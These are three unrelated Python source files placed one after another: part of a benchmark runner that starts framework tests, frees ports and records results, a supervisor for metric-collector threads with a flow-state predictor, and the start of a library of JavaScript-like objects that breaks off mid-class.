logging.debug("Start __run_tests.")
logging.debug("__name__ = %s",__name__)
error_happened = False
if self.os.lower() == 'windows':
logging.debug("Executing __run_tests on Windows")
for test in tests:
with open('current_benchmark.txt', 'w') as benchmark_resume_file:
benchmark_resume_file.write(test.name)
if self.__run_test(test) != 0:
error_happened = True
else:
logging.debug("Executing __run_tests on Linux")
# Setup a nice progressbar and ETA indicator
widgets = [self.mode, ': ', progressbar.Percentage(),
' ', progressbar.Bar(),
' Rough ', progressbar.ETA()]
pbar = progressbar.ProgressBar(widgets=widgets, maxval=len(tests)).start()
pbar_test = 0
# These features do not work on Windows
for test in tests:
pbar.update(pbar_test)
pbar_test = pbar_test + 1
if __name__ == 'benchmark.benchmarker':
print header("Running Test: %s" % test.name)
with open('current_benchmark.txt', 'w') as benchmark_resume_file:
benchmark_resume_file.write(test.name)
test_process = Process(target=self.__run_test, name="Test Runner (%s)" % test.name, args=(test,))
test_process.start()
test_process.join(self.run_test_timeout_seconds)
self.__load_results() # Load intermediate result from child process
if(test_process.is_alive()):
logging.debug("Child process for {name} is still alive. Terminating.".format(name=test.name))
self.__write_intermediate_results(test.name,"__run_test timeout (="+ str(self.run_test_timeout_seconds) + " seconds)")
test_process.terminate()
test_process.join()
if test_process.exitcode != 0:
error_happened = True
pbar.finish()
if os.path.isfile('current_benchmark.txt'):
os.remove('current_benchmark.txt')
logging.debug("End __run_tests.")
if error_happened:
return 1
return 0
############################################################
# End __run_tests
############################################################
############################################################
# __run_test
# 2013-10-02 ASB Previously __run_tests. This code now only
# processes a single test.
#
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __run_test(self, test):
# Used to capture return values
def exit_with_code(code):
if self.os.lower() == 'windows':
return code
else:
sys.exit(code)
try:
os.makedirs(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name)))
except:
pass
with open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'out.txt'), 'w') as out, \
open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'err.txt'), 'w') as err:
if test.os.lower() != self.os.lower() or test.database_os.lower() != self.database_os.lower():
out.write("OS or Database OS specified in benchmark_config does not match the current environment. Skipping.\n")
return exit_with_code(0)
# If the test is in the excludes list, we skip it
if self.exclude != None and test.name in self.exclude:
out.write("Test {name} has been added to the excludes list. Skipping.\n".format(name=test.name))
return exit_with_code(0)
out.write("test.os.lower() = {os} test.database_os.lower() = {dbos}\n".format(os=test.os.lower(),dbos=test.database_os.lower()))
out.write("self.results['frameworks'] != None: {val}\n".format(val=str(self.results['frameworks'] != None)))
out.write("test.name: {name}\n".format(name=str(test.name)))
out.write("self.results['completed']: {completed}\n".format(completed=str(self.results['completed'])))
if self.results['frameworks'] != None and test.name in self.results['completed']:
out.write('Framework {name} found in latest saved data. Skipping.\n'.format(name=str(test.name)))
return exit_with_code(1)
out.flush()
out.write(header("Beginning %s" % test.name, top='='))
out.flush()
##########################
# Start this test
##########################
out.write(header("Starting %s" % test.name))
out.flush()
try:
if test.requires_database():
p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, stdout=out, stderr=err, shell=True)
p.communicate("""
sudo restart mysql
sudo restart mongodb
sudo service redis-server restart
sudo /etc/init.d/postgresql restart
""")
time.sleep(10)
if self.__is_port_bound(test.port):
err.write(header("Error: Port %s is not available, attempting to recover" % test.port))
err.flush()
print "Error: Port %s is not available, attempting to recover" % test.port
self.__forciblyEndPortBoundProcesses(test.port, out, err)
if self.__is_port_bound(test.port):
self.__write_intermediate_results(test.name, "port " + str(test.port) + " is not available before start")
err.write(header("Error: Port %s is not available, cannot start %s" % (test.port, test.name)))
err.flush()
print "Error: Unable to recover port, cannot start test"
return exit_with_code(1)
result = test.start(out, err)
if result != 0:
test.stop(out, err)
time.sleep(5)
err.write( "ERROR: Problem starting {name}\n".format(name=test.name) )
err.write(header("Stopped %s" % test.name))
err.flush()
self.__write_intermediate_results(test.name,"<setup.py>#start() returned non-zero")
return exit_with_code(1)
logging.info("Sleeping %s seconds to ensure framework is ready" % self.sleep)
time.sleep(self.sleep)
##########################
# Verify URLs
##########################
logging.info("Verifying framework URLs")
passed_verify = test.verify_urls(out, err)
out.flush()
err.flush()
##########################
# Benchmark this test
##########################
if self.mode == "benchmark":
logging.info("Benchmarking")
out.write(header("Benchmarking %s" % test.name))
out.flush()
test.benchmark(out, err)
out.flush()
err.flush()
##########################
# Stop this test
##########################
out.write(header("Stopping %s" % test.name))
out.flush()
test.stop(out, err)
out.flush()
err.flush()
time.sleep(5)
if self.__is_port_bound(test.port):
err.write("Port %s was not freed. Attempting to free it." % (test.port, ))
err.flush()
self.__forciblyEndPortBoundProcesses(test.port, out, err)
time.sleep(5)
if self.__is_port_bound(test.port):
err.write(header("Error: Port %s was not released by stop %s" % (test.port, test.name)))
err.flush()
self.__write_intermediate_results(test.name, "port " + str(test.port) + " was not released by stop")
return exit_with_code(1)
out.write(header("Stopped %s" % test.name))
out.flush()
time.sleep(5)
##########################################################
# Save results thus far into toolset/benchmark/latest.json
##########################################################
out.write(header("Saving results through %s" % test.name))
out.flush()
self.__write_intermediate_results(test.name,time.strftime("%Y%m%d%H%M%S", time.localtime()))
if self.mode == "verify" and not passed_verify:
print "Failed verify!"
return exit_with_code(1)
except (OSError, IOError, subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py> raised an exception")
err.write(header("Subprocess Error %s" % test.name))
traceback.print_exc(file=err)
err.flush()
try:
test.stop(out, err)
except (subprocess.CalledProcessError) as e:
self.__write_intermediate_results(test.name,"<setup.py>#stop() raised an error")
err.write(header("Subprocess Error: Test .stop() raised exception %s" % test.name))
traceback.print_exc(file=err)
err.flush()
out.close()
err.close()
return exit_with_code(1)
# TODO - subprocess should not catch this exception!
# Parent process should catch it and cleanup/exit
except (KeyboardInterrupt) as e:
test.stop(out, err)
out.write(header("Cleaning up..."))
out.flush()
self.__finish()
sys.exit(1)
out.close()
err.close()
return exit_with_code(0)
############################################################
# End __run_tests
############################################################
############################################################
# __is_port_bound
# Check if the requested port is available. If it
# isn't available, then a previous test probably didn't
# shutdown properly.
############################################################
def __is_port_bound(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Try to bind to all IP addresses, this port
s.bind(("", port))
# If we get here, we were able to bind successfully,
# which means the port is free.
except:
# If we get an exception, it might be because the port is still bound
# which would be bad, or maybe it is a privileged port (<1024) and we
# are not running as root, or maybe the server is gone, but sockets are
# still in TIME_WAIT (SO_REUSEADDR). To determine which scenario, try to
# connect.
try:
s.connect(("127.0.0.1", port))
# If we get here, we were able to connect to something, which means
# that the port is still bound.
return True
except:
# An exception means that we couldn't connect, so a server probably
# isn't still running on the port.
pass
finally:
s.close()
return False
############################################################
# End __is_port_bound
############################################################
def __forciblyEndPortBoundProcesses(self, test_port, out, err):
p = subprocess.Popen(['sudo', 'netstat', '-lnp'], stdout=subprocess.PIPE)
(ns_out, ns_err) = p.communicate()
for line in ns_out.splitlines():
# Handles tcp, tcp6, udp, udp6
if line.startswith('tcp') or line.startswith('udp'):
splitline = line.split()
port = int(splitline[3].split(':')[-1])
pid = splitline[-1].split('/')[0]
# Sometimes the last column is just a dash
if pid == '-':
continue
if port > 6000:
ps = subprocess.Popen(['ps','p',pid], stdout=subprocess.PIPE)
(out_6000, err_6000) = ps.communicate()
err.write(textwrap.dedent(
"""
Port {port} should not be open. See the following lines for information
{netstat}
{ps}
""".format(port=port, netstat=line, ps=out_6000)))
err.flush()
if port == test_port:
err.write( header("Error: Test port %s should not be open" % port, bottom='') )
try:
ps = subprocess.Popen(['ps','p',pid], stdout=subprocess.PIPE)
# Store some info about this process
(out_15, err_15) = ps.communicate()
children = subprocess.Popen(['ps','--ppid',pid,'-o','ppid'], stdout=subprocess.PIPE)
(out_children, err_children) = children.communicate()
err.write(" Sending SIGTERM to this process:\n %s\n" % out_15)
err.write(" Also expecting these child processes to die:\n %s\n" % out_children)
subprocess.check_output(['sudo','kill',pid])
# Sleep for 10 sec; kill can be finicky
time.sleep(10)
# Check that PID again
ps = subprocess.Popen(['ps','p',pid], stdout=subprocess.PIPE)
(out_9, err_9) = ps.communicate()
if len(out_9.splitlines()) != 1: # One line for the header row
err.write(" Process is still alive!\n")
err.write(" Sending SIGKILL to this process:\n %s\n" % out_9)
subprocess.check_output(['sudo','kill','-9', pid])
else:
err.write(" Process has been terminated\n")
# Ensure all children are dead
c_pids = [c_pid.strip() for c_pid in out_children.splitlines()[1:]]
for c_pid in c_pids:
ps = subprocess.Popen(['ps','p',c_pid], stdout=subprocess.PIPE)
(out_9, err_9) = ps.communicate()
if len(out_9.splitlines()) != 1: # One line for the header row
err.write(" Child Process %s is still alive, sending SIGKILL\n" % c_pid)
subprocess.check_output(['sudo','kill','-9', pid])
except Exception as e:
err.write( " Error: Unknown exception %s\n" % e )
err.write( header("Done attempting to recover port %s" % port, top='') )
############################################################
# __parse_results
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __parse_results(self, tests):
# Run the method to get the commmit count of each framework.
self.__count_commits()
# Call the method which counts the sloc for each framework
self.__count_sloc()
# Time to create parsed files
# Aggregate JSON file
with open(os.path.join(self.full_results_directory(), "results.json"), "w") as f:
f.write(json.dumps(self.results, indent=2))
############################################################
# End __parse_results
############################################################
#############################################################
# __count_sloc
#############################################################
def __count_sloc(self):
frameworks = gather_frameworks(include=self.test,
exclude=self.exclude, benchmarker=self)
jsonResult = {}
for framework, testlist in frameworks.iteritems():
if not os.path.exists(os.path.join(testlist[0].directory, "source_code")):
logging.warn("Cannot count lines of code for %s - no 'source_code' file", framework)
continue
# Unfortunately the source_code files use lines like
# ./cpoll_cppsp/www/fortune_old instead of
# ./www/fortune_old
# so we have to back our working dir up one level
wd = os.path.dirname(testlist[0].directory)
try:
command = "cloc --list-file=%s/source_code --yaml" % testlist[0].directory
# Find the last instance of the word 'code' in the yaml output. This should
# be the line count for the sum of all listed files or just the line count
# for the last file in the case where there's only one file listed.
command = command + "| grep code | tail -1 | cut -d: -f 2"
logging.debug("Running \"%s\" (cwd=%s)", command, wd)
lineCount = subprocess.check_output(command, cwd=wd, shell=True)
jsonResult[framework] = int(lineCount)
except subprocess.CalledProcessError:
continue
except ValueError as ve:
logging.warn("Unable to get linecount for %s due to error '%s'", framework, ve)
self.results['rawData']['slocCounts'] = jsonResult
############################################################
# End __count_sloc
############################################################
############################################################
# __count_commits
#
############################################################
def __count_commits(self):
frameworks = gather_frameworks(include=self.test,
exclude=self.exclude, benchmarker=self)
def count_commit(directory, jsonResult):
command = "git rev-list HEAD -- " + directory + " | sort -u | wc -l"
try:
commitCount = subprocess.check_output(command, shell=True)
jsonResult[framework] = int(commitCount)
except subprocess.CalledProcessError:
pass
# Because git can be slow when run in large batches, this
# calls git up to 4 times in parallel. Normal improvement is ~3-4x
# in my trials, or ~100 seconds down to ~25
# This is safe to parallelize as long as each thread only
# accesses one key in the dictionary
threads = []
jsonResult = {}
t1 = datetime.now()
for framework, testlist in frameworks.iteritems():
directory = testlist[0].directory
t = threading.Thread(target=count_commit, args=(directory,jsonResult))
t.start()
threads.append(t)
# Git has internal locks, full parallel will just cause contention
# and slowness, so we rate-limit a bit
if len(threads) >= 4:
threads[0].join()
threads.remove(threads[0])
# Wait for remaining threads
for t in threads:
t.join()
t2 = datetime.now()
# print "Took %s seconds " % (t2 - t1).seconds
self.results['rawData']['commitCounts'] = jsonResult
self.commits = jsonResult
############################################################
# End __count_commits
############################################################
############################################################
# __write_intermediate_results
############################################################
def __write_intermediate_results(self,test_name,status_message):
try:
self.results["completed"][test_name] = status_message
with open(os.path.join(self.latest_results_directory, 'results.json'), 'w') as f:
f.write(json.dumps(self.results, indent=2))
except (IOError):
logging.error("Error writing results.json")
############################################################
# End __write_intermediate_results
############################################################
def __load_results(self):
try:
with open(os.path.join(self.latest_results_directory, 'results.json')) as f:
self.results = json.load(f)
except (ValueError, IOError):
pass
############################################################
# __finish
############################################################
def __finish(self):
tests = self.__gather_tests
# Normally you don't have to use Fore.BLUE before each line, but
# Travis-CI seems to reset color codes on newline (see travis-ci/travis-ci#2692)
# or stream flush, so we have to ensure that the color code is printed repeatedly
prefix = Fore.CYAN
for line in header("Verification Summary", top='=', bottom='').split('\n'):
print prefix + line
for test in tests:
print prefix + "| Test: %s" % test.name
if test.name in self.results['verify'].keys():
for test_type, result in self.results['verify'][test.name].iteritems():
if result.upper() == "PASS":
color = Fore.GREEN
elif result.upper() == "WARN":
color = Fore.YELLOW
else:
color = Fore.RED
print prefix + "| " + test_type.ljust(11) + ' : ' + color + result.upper()
else:
print prefix + "| " + Fore.RED + "NO RESULTS (Did framework launch?)"
print prefix + header('', top='', bottom='=') + Style.RESET_ALL
print "Time to complete: " + str(int(time.time() - self.start_time)) + " seconds"
print "Results are saved in " + os.path.join(self.result_directory, self.timestamp)
############################################################
# End __finish
############################################################
##########################################################################################
# Constructor
##########################################################################################
############################################################
# Initialize the benchmarker. The args are the arguments
# parsed via argparser.
############################################################
def __init__(self, args):
# Map type strings to their objects
types = dict()
types['json'] = JsonTestType()
types['db'] = DBTestType()
types['query'] = QueryTestType()
types['fortune'] = FortuneTestType()
types['update'] = UpdateTestType()
types['plaintext'] = PlaintextTestType()
# Turn type into a map instead of a string
if args['type'] == 'all':
args['types'] = types
else:
args['types'] = { args['type'] : types[args['type']] }
del args['type']
args['max_threads'] = args['threads']
self.__dict__.update(args)
# pprint(self.__dict__)
self.start_time = time.time()
self.run_test_timeout_seconds = 3600
# setup logging
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
# setup some additional variables
if self.database_user == None: self.database_user = self.client_user
if self.database_host == None: self.database_host = self.client_host
if self.database_identity_file == None: self.database_identity_file = self.client_identity_file
# Remember root directory
self.fwroot = setup_util.get_fwroot()
# setup results and latest_results directories
self.result_directory = os.path.join("results", self.name)
self.latest_results_directory = self.latest_results_directory()
if self.parse != None:
self.timestamp = self.parse
else:
self.timestamp = time.strftime("%Y%m%d%H%M%S", time.localtime())
# Load the latest data
#self.latest = None
#try:
# with open('toolset/benchmark/latest.json', 'r') as f:
# # Load json file into config object
# self.latest = json.load(f)
# logging.info("toolset/benchmark/latest.json loaded to self.latest")
# logging.debug("contents of latest.json: " + str(json.dumps(self.latest)))
#except IOError:
# logging.warn("IOError on attempting to read toolset/benchmark/latest.json")
#
#self.results = None
#try:
# if self.latest != None and self.name in self.latest.keys():
# with open(os.path.join(self.result_directory, str(self.latest[self.name]), 'results.json'), 'r') as f:
# # Load json file into config object
# self.results = json.load(f)
#except IOError:
# pass
self.results = None
try:
with open(os.path.join(self.latest_results_directory, 'results.json'), 'r') as f:
#Load json file into results object
self.results = json.load(f)
except IOError:
logging.warn("results.json for test %s not found.",self.name)
if self.results == None:
self.results = dict()
self.results['name'] = self.name
self.results['concurrencyLevels'] = self.concurrency_levels
self.results['queryIntervals'] = self.query_levels
self.results['frameworks'] = [t.name for t in self.__gather_tests]
self.results['duration'] = self.duration
self.results['rawData'] = dict()
self.results['rawData']['json'] = dict()
self.results['rawData']['db'] = dict()
self.results['rawData']['query'] = dict()
self.results['rawData']['fortune'] = dict()
self.results['rawData']['update'] = dict()
self.results['rawData']['plaintext'] = dict()
self.results['completed'] = dict()
self.results['succeeded'] = dict()
self.results['succeeded']['json'] = []
self.results['succeeded']['db'] = []
self.results['succeeded']['query'] = []
self.results['succeeded']['fortune'] = []
self.results['succeeded']['update'] = []
self.results['succeeded']['plaintext'] = []
self.results['failed'] = dict()
self.results['failed']['json'] = []
self.results['failed']['db'] = []
self.results['failed']['query'] = []
self.results['failed']['fortune'] = []
self.results['failed']['update'] = []
self.results['failed']['plaintext'] = []
self.results['verify'] = dict()
else:
#for x in self.__gather_tests():
# if x.name not in self.results['frameworks']:
# self.results['frameworks'] = self.results['frameworks'] + [x.name]
# Always overwrite framework list
self.results['frameworks'] = [t.name for t in self.__gather_tests]
# Setup the ssh command string
self.database_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.database_user + "@" + self.database_host
self.client_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.client_user + "@" + self.client_host
if self.database_identity_file != None:
self.database_ssh_string = self.database_ssh_string + " -i " + self.database_identity_file
if self.client_identity_file != None:
self.client_ssh_string = self.client_ssh_string + " -i " + self.client_identity_file
if self.install is not None:
install = Installer(self, self.install_strategy)
install.install_software()
############################################################
# End __init__
############################################################
|
supervisor.py
|
import datetime
import importlib
import logging
import time
import os
import threading
from pathlib import Path
from types import ModuleType
from typing import List
from typing import Optional
from flowd.model import logistic_regression
from flowd.utils import wnf
import pythoncom
from flowd import metrics
MetricModules = List[ModuleType]
Collectors = List[metrics.BaseCollector]
class Supervisor:
"""Does all the initial setup and manages the lifecycle
of metric collectors."""
def __init__(self) -> None:
self.collect_interval: float = 60
self.collected_data_path = os.path.expanduser("~/flowd/")
self._collectors: Collectors = []
self._quit = threading.Event()
self._active: List[CollectorThread] = []
self._data: Optional[str] = None
self._data_pivot: Optional[str] = None
self.model = logistic_regression.train_model()
self.flow_threshold = 70
self._fs_data: Optional[str] = None
self._flow_state = 0
@staticmethod
def _sort_collectors(element):
name, v = element.get_current_state()
return name
def configure(self) -> None:
os.makedirs(self.collected_data_path, exist_ok=True)
self._data = os.path.join(self.collected_data_path, "data.csv")
self._data_pivot = os.path.join(self.collected_data_path, "data_pivot.csv")
self._fs_data = os.path.join(self.collected_data_path, "fs_data.csv")
logging.info(f"storing collected data in {self._data}")
self._collectors = lookup_handlers(collect_metric_modules())
self._collectors.sort(key=self._sort_collectors)
self.write_headers()
def write_headers(self) -> None:
if not os.path.exists(self._data_pivot) or os.path.getsize(self._data_pivot) == 0:
with open(self._data_pivot, "a") as f1:
header = "date"
for c in self._collectors:
name, v = c.get_current_state()
header = f"{header},{name}"
f1.write(f"{header}\n")
if not os.path.exists(self._fs_data) or os.path.getsize(self._fs_data) == 0:
with open(self._fs_data, "a") as fs:
fs.write("Date,Flow State Prediction (%)\n")
def run(self) -> None:
if not self._collectors:
logging.error(
"we didn't find any collector implementations, nothing to do"
)
return
logging.info("began collecting metrics")
self._active = [CollectorThread(c) for c in self._collectors]
for t in self._active:
t.start()
while not self._quit.is_set():
time.sleep(self.collect_interval)
threading.Thread(target=self.output_collected_metrics).start()
self._flow_state = self.check_flow_state()
wnf.set_focus_mode(2 if self._flow_state > self.flow_threshold else 0)
def check_flow_state(self) -> float:
p = logistic_regression.predict(logistic_regression.pivot_stats(), self.model, 15) * 100
logging.info(f'Last 15 minutes prediction {p}%')
return p
def stop(self, timeout: float = None) -> None:
self._quit.set()
for c in self._active:
c._collector.stop_collect()
c.join(timeout)
def output_collected_metrics(self) -> None:
if not self._data:
logging.warning("unknown data file path; did you call configure()?")
return
ts = datetime.datetime.now()
with open(self._data, "a") as f:
with open(self._data_pivot, "a") as f1:
row = ""
for ct in self._active:
name, current = ct.pop()
if not ct.is_alive():
current = -1
f.write(f"{name},{current},{ts}\n")
row = f"{row},{current}"
f1.write(f"{ts}{row}\n")
with open(self._fs_data, "a") as fs:
fs.write(f"{ts},{self._flow_state}\n")
class CollectorThread(threading.Thread):
"""A collector interface-aware thread wrapper."""
def __init__(self, collector: metrics.BaseCollector) -> None:
self._collector = collector
super().__init__(
name=f"CollectorThread-{self._collector.metric_name}", daemon=True
)
def run(self) -> None:
pythoncom.CoInitialize()
try:
self._collector.start_collect()
except Exception as e:
logging.error(f"Unexpected error in {self.name}: {e}", exc_info=True)
return
finally:
pythoncom.CoUninitialize()
self._collector.stop_collect()
def pop(self) -> metrics.CollectedData:
v = self._collector.get_current_state()
self._collector.cleanup()
return v
def collect_metric_modules() -> MetricModules:
"""Gets a list of all available metric modules
from the metrics package. Doesn't do any filtering or collector lookups."""
# TODO(alex): check how well the runtime module
# collection works when compiled to a binary
logging.debug("looking for collectors in the metrics module")
mods = []
metrics_pkg_path = Path(metrics.__file__).parent
for file in metrics_pkg_path.glob("*"):
if file.suffix not in (".py", ".pyc", ".pyd"):
continue
if file.stem == "__init__":
continue
module_name = ".".join([metrics.__name__, file.stem])
try:
module = importlib.import_module(module_name)
except (ImportError, AttributeError) as e:
logging.error(e)
continue
mods.append(module)
return mods
def lookup_handlers(mods: MetricModules) -> Collectors:
"""Gets a list of handlers from list of metric modules."""
collectors = []
for m in mods:
for v in m.__dict__.values():
try:
if v and issubclass(v, metrics.BaseCollector):
collectors.append(v())
logging.info(
f"found a metric collector {m.__name__}:{v.metric_name}"
)
except TypeError:
continue
return collectors
|
javascript.py
|
"""
domonic.javascript
====================================
- https://www.w3schools.com/jsref/jsref_reference.asp
- https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference
"""
import array
import chunk
import datetime
from datetime import timezone
import gc
import json
import math
import multiprocessing
import os
import random
import re
import signal
import struct
import sys
import threading
import time
import calendar
import urllib.parse
from multiprocessing.pool import ThreadPool as Pool
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
from urllib.parse import quote, unquote
import requests
from dateutil.parser import parse, parserinfo
from domonic.webapi.url import URL, URLSearchParams
from domonic.webapi.webstorage import Storage
def function(python_str: str) -> str:
"""[evals a string i.e.
sup = function('''print(hi)''')
sup()
]
Args:
python_str ([str]): [some valid python code as a string]
"""
def anon():
return eval(python_str)
return anon
# TODO - list all javascript keywords to python keywords
true: bool = True
false: bool = False
null: object = None
undefined: object = None
# globalThis # TODO - do i need to use inpect? or is globals() ok?
# def typeof(v):
# return type(v).__name__
class Boolean:
"""[Creates a Boolean Object.
Warning this is NOT a boolean type. for that use Global.Boolean()]
"""
def __init__(self, value=False) -> None:
self.value: bool = Global.Boolean(value)
class Object:
def __init__(self, obj=None, *args, **kwargs) -> None:
"""[Creates a Javascript-like Object in python]
Args:
obj ([type]): [pass an object, dict or callable to the contructor]
"""
# print('object created!')
if obj is None:
obj = {}
self.prototype = self.__class__
self.__extensible = True
self.__frozen = False
self.__sealed = False
for arg in args:
self.__dict__.update(arg)
self.__dict__.update(kwargs)
# self.__dict__ = {}
if callable(obj):
self.__dict__.update(obj())
if isinstance(obj, dict):
self.__dict__.update(obj)
else:
try:
self.__dict__ = {}
self.__dict__.update(obj.__dict__)
self.__dict__.update(kwargs)
self.__dict__.update(args)
# self.__dict__['__class__'] = obj.__class__.__name__
# self.__dict__['__module__'] = obj.__module__
# self.__dict__['__doc__'] = obj.__doc__
# self.__dict__['__proto__'] = obj
# self.__dict__['__proto__'].__class__ = Object
# self.__dict__['__proto__'].__dict__ = self.__dict__
except Exception as e:
print("Object.__init__() failed to set attribs", e)
def __str__(self):
"""Returns a string representation of the object"""
d = self.__dict__.copy()
for k, v in list(d.items()):
if "__" in k:
del d[k]
if "prototype" in k:
del d[k]
return str(d)
# def __repr__(self):
# """ Returns a string representation of the object."""
# return self.toString()
@staticmethod
def fromEntries(entries):
"""
transforms a list of lists containing key and value into an object.
@param entries: a list containing key and value tuples. The key and value are separated by ':'
@type entries: list of tuple(string, string)
@returns: a dict object.
>>> fromEntries(entries)
{'a': 1, 'b': 2, 'c': 3}
"""
return {k: v for k, v in entries}
@staticmethod
def assign(target, source):
"""Copies the values of all enumerable own properties from one or more source objects to a target object."""
if isinstance(target, dict):
if isinstance(source, dict):
for k, v in source.items():
target[k] = v
else:
for k, v in source.__dict__.items():
target[k] = v
else:
if isinstance(source, dict):
for k, v in source.items():
setattr(target, k, v)
else:
for k, v in source.attribs.items():
setattr(target, k, v)
# return target
# for prop in source.__dict__:
# if source.propertyIsEnumerable(prop):
# target.__dict__[prop] = source.__dict__[prop]
return target
@staticmethod
def create(proto, propertiesObject=None):
"""Creates a new object with the specified prototype object and properties."""
if propertiesObject is None:
return Object(proto)
if isinstance(propertiesObject, dict):
return Object(propertiesObject)
elif isinstance(propertiesObject, Object):
return propertiesObject
elif isinstance(propertiesObject, list):
return Object.fromEntries(propertiesObject)
else:
return propertiesObject
# return Object(propertiesObject)
# obj = {}
# for key in proto.keys():
# obj[key] = propertiesObject[key]
# return obj
@staticmethod
def defineProperty(obj, prop, descriptor):
"""Adds the named property described by a given descriptor to an object."""
obj[prop] = descriptor
# @staticmethod
# def defineProperties(obj, props):
# """ Adds the named properties described by the given descriptors to an object. """
# for prop, desc in props.items():
# obj.__define_property__(prop, desc) # TODO - obviously that wont work
@staticmethod
def entries(obj):
"""Returns an array containing all of the [key, value] pairs in the object."""
if isinstance(obj, dict):
return [[k, v] for k, v in obj.items()]
if isinstance(obj, (float, int)):
return []
@staticmethod
def keys(obj):
"""Returns an array containing the names of all of the given object's own enumerable string properties."""
if isinstance(obj, dict):
return obj.keys()
if isinstance(obj, (float, int)):
return []
return obj.__dict__.keys() # TODO - this is probably wrong
@staticmethod
def values(obj):
"""Returns an array containing the values that correspond to
all of a given object's own enumerable string properties."""
if isinstance(obj, dict):
return obj.values()
if isinstance(obj, (float, int)):
return []
return obj.__dict__.values() # TODO - this is probably wrong
@staticmethod
def getOwnPropertyDescriptor(obj, prop):
"""Returns a property descriptor for a named property on an object."""
if isinstance(obj, dict):
return obj[prop]
return obj.__dict__[prop]
@staticmethod
def getOwnPropertyNames(obj):
"""Returns an array containing the names of all of the given object's
own enumerable and non-enumerable properties."""
if isinstance(obj, dict):
return obj.keys()
elif isinstance(obj, Object):
return obj.__dict__.keys()
elif isinstance(obj, object):
return [prop for prop in dir(obj) if not prop.startswith("__")]
return obj.__dict__.keys()
# @staticmethod
# def _is(value1, value2):
# """ Compares if two values are the same value.
# Equates all NaN values (which differs from both Abstract Equality Comparison
# and Strict Equality Comparison)."""
# pass
@staticmethod
def getOwnPropertySymbols(obj):
"""Returns an array of all symbol properties found directly upon a given object."""
if isinstance(obj, dict):
return []
return [prop for prop in dir(obj) if not prop.startswith("__")]
@staticmethod
def getPrototypeOf(obj):
"""Returns the prototype (internal [[Prototype]] property) of the specified object."""
if isinstance(obj, dict):
return obj
elif isinstance(obj, Object):
return obj.prototype
elif isinstance(obj, object):
return obj.__class__
return obj.__proto__
# @property #TODO - static or prop?
# def isExtensible(obj):
# """ Determines if extending of an object is allowed """
# return obj.__extensible
# @property #TODO - static or prop?
# def isSealed(obj):
# """ Determines if an object is sealed """
# return obj.__sealed
# @property
# def preventExtensions(obj):
# """ Prevents any extensions of an object. """
# if isinstance(obj, dict):
# return False
# elif isinstance(obj, Object):
# obj.extensible = False
# return True
# elif isinstance(obj, object):
# return False
# return False
# @property
# def seal(obj):
# """ Prevents other code from deleting properties of an object. """
# if isinstance(obj, dict):
# return False
# elif isinstance(obj, Object):
# obj.sealed = True
# return True
# elif isinstance(obj, object):
# return False
# return False
# @property
# def setPrototypeOf(obj, prototype):
# """ Sets the object's prototype (its internal [[Prototype]] property). """
# if isinstance(obj, dict):
# return False
# elif isinstance(obj, Object):
# obj.prototype = prototype
# return True
# elif isinstance(obj, object):
# return False
# return False
@property # TODO - static or prop?
def isFrozen(self, obj):
"""Determines if an object was frozen."""
return self.__isFrozen
@staticmethod # TODO - static or prop?
def freeze(obj):
"""Freezes an object. Other code cannot delete or change its properties."""
obj.__isFrozen = True
# def prototype(self, obj):
# """
# prototype and allows you to add properties and methods to this object
# """
# if isinstance(obj, dict):
# return False
# elif isinstance(obj, Object):
# obj.prototype = self
# return True
# elif isinstance(obj, object):
# return False
# return False
def __defineGetter__(self, prop, func):
"""Adds a getter function for the specified property."""
self.__dict__[prop] = property(func)
return self
def __defineSetter__(self, prop, func):
"""Associates a function with a property that, when set, calls the function."""
self.__dict__[prop] = property(func)
return self
def __lookupGetter__(self, prop):
"""
Returns the getter function for the specified property.
"""
return self.__dict__[prop]
def __lookupSetter__(self, prop):
"""Returns the function associated with the specified property by the __defineSetter__() method."""
return self.__dict__[prop]
def hasOwnProperty(self, prop):
"""Returns a boolean indicating whether an object contains the specified property
as a direct property of that object and not inherited through the prototype chain."""
# raise NotImplementedError
# return hasattr(self, prop)
return self.__dict__.get(prop, None) != None
def isPrototypeOf(self, obj):
"""Returns a boolean indicating whether an object is a copy of this object."""
if isinstance(obj, Object):
return obj.prototype == self
elif isinstance(obj, dict):
return obj == self
elif isinstance(obj, object):
return obj.__class__ == self.__class__ and obj.__dict__ == self.__dict__
return obj.__class__ == self.__class__ and obj.__proto__ == self
# def propertyIsEnumerable(self, prop):
# """ Returns a boolean indicating whether the specified property is enumerable. """
# pass
def toLocaleString(self):
"""Calls toString()"""
return self.toString()
def toString(self):
"""Returns a string representation of the object."""
return "[" + self.__class__.__name__ + ": " + str(self.__dict__) + "]"
def valueOf(self):
"""Returns the value of the object."""
return self
def __iter__(self):
"""Iterates over object's properties."""
for prop in self.__dict__:
yield prop
for key in self.__dict__:
yield key
# return
# return self.__dict__.__iter__()
def __hash__(self):
"""Returns the hash of the object."""
return hash(self.toString())
def __eq__(self, other):
"""Compares two objects."""
if isinstance(other, Object):
return self.toString() == other.toString()
return False
def __ne__(self, other):
"""Compares two objects."""
if isinstance(other, Object):
return self.toString() != other.toString()
return True
def __nonzero__(self):
"""Returns whether the object is false."""
return self.toString() != ""
def __bool__(self):
"""Returns whether the object is false."""
return self.toString() != ""
# def __dict__(self):
# """ Returns the object's attributes as a dictionary. """
# return self.__dict__
def __getitem__(self, key):
"""Returns the value of the specified property."""
# return self.__dict__[key]
# return self.__dict__.get(key, None)
return self.__dict__.get(key)
def __deepcopy__(self, memo):
"""Makes a deep copy of the object."""
return self.__class__(self.__dict__)
def __setitem__(self, key, value):
"""Sets the value of the specified property."""
# self.__dict__[key] = value
return self.__dict__.__setitem__(key, value)
def __delitem__(self, key):
"""Deletes the specified property."""
del self.__dict__[key]
def __len__(self):
